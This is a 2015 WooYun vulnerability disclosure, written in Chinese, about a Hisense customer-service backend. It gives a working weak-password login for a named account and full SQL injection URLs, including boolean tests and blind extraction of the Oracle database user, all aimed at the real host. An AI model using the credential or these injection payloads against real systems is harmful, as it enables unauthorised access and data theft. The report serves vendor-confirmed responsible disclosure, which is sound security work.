当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165986

漏洞标题:海信某后台弱口令+注入

相关厂商:hisense.com

漏洞作者: Busliv

提交时间:2015-12-30 11:19

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-30: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经确认,细节仅向厂商公开
2016-01-10: 细节向核心白帽子及相关领域专家公开
2016-01-20: 细节向普通白帽子公开
2016-01-30: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

弱口令+注入

详细说明:

url:http://css.hisense.com/HXCSS/
弱口令:&username=liujinwei&password=Liujinwei123
成功登陆,支持多个系统登陆

1.png


QQ图片20151230103336.png


各种工单

gd.png


合同管理(9364个门面店信息)

08.png


各种工单处理,

Q335.png


漏洞证明:

sql注入:
url:

http://css.hisense.com/HXCSS/PagePopUp.do?method=affixManager&mainDBTable=eb_bulletin_inf&mainDBRecordId=2015040221685067&isOnlyview=true


参数:mainDBRecordId
返回正确

http://css.hisense.com/HXCSS/PagePopUp.do?method=affixManager&mainDBTable=eb_bulletin_inf&mainDBRecordId=2015040221685067%27and%201=1--&isOnlyview=true


13.png


返回错误

http://css.hisense.com/HXCSS/PagePopUp.do?method=affixManager&mainDBTable=eb_bulletin_inf&mainDBRecordId=2015040221685067%27and%201=2--&isOnlyview=true


653.png


oracle的数据库手工搞起
判断用户长度,长度为5时返回正确

http://css.hisense.com/HXCSS/PagePopUp.do?method=affixManager&mainDBTable=eb_bulletin_inf&mainDBRecordId=2015040221685067%27and%20length%28SYS_CONTEXT%28%27USERENV%27,%27CURRENT_USER%27%29%29=5--&isOnlyview=true


31.png


猜解用户名

http://css.hisense.com/HXCSS/PagePopUp.do?method=affixManager&mainDBTable=eb_bulletin_inf&mainDBRecordId=2015040221685067'ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),9,1))=95--&isOnlyview=true


253.png


对应ascii码为[72,88,67,83,83]
转下编码

349.png


用户名为 HXCSS

修复方案:

用户体系管理;过滤

版权声明:转载请注明来源 Busliv@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-31 09:02

厂商回复:

谢谢您的提醒,我们已安排处理。

最新状态:

暂无